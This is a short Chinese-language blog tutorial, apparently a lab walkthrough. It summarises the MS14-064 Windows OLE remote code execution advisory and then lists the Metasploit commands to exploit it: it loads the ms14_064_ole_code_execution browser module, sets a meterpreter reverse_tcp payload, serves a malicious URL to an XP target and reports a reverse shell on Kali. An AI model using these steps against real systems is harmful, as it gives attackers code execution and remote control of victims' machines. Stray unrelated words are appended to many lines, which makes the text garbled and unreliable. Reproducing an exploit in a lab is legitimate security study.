此安全更新可解決 Microsoft Windows 對象連接與嵌入 (OLE) 中 2 個私下報告的漏洞。最嚴重的漏洞可能在用戶使用 Internet Explorer 查看經特殊設計的網頁時容許遠程執行代碼。成功利用這些漏洞的攻擊者能夠在當前用戶的上下文中運行任意代碼。若是當前用戶使用管理用戶權限登陸,則攻擊者可隨後安裝程序;查看、更改或刪除數據;或者建立擁有徹底用戶權限的新賬戶。那些賬戶被配置爲擁有較少用戶權限的用戶比具備管理用戶權限的用戶受到的影響要小。 對於 Microsoft Windows 全部受支持的版本,此安全更新的等級爲「嚴重」。更多詳細信息可見:微軟安全技術中心shell
遠程攻擊者利用此漏洞經過構造的網站執行任意代碼,影響Win95+IE3 – Win10+IE11全版本windows
msfconsole //啓動MSF安全
search ms14 //能夠搜索14年的漏洞tcp
use exploit/windows/browser/ms14_064_ole_code_execution // 加載漏洞利用模塊測試
show payload //查看可用網站
set payload windows/meterpreter/reverse_tcp //設置反彈鏈接shellui
特別注意:上圖在requied列中「yes」的屬性是必須要的。其中標記的第一個屬性默認爲false 須要設置爲true ,由於msf中自帶的漏洞利用exp調用的是 powershell。 因此msf中的exp代碼只對安裝powershell的系統生效。查看信息,能夠攻擊的系統有xp和win7設計
各個屬性配置好後 執行exploit便可code
獲得一個URL地址,到靶機上進行(xp)測試對象
kail反彈了一個shell,測試成功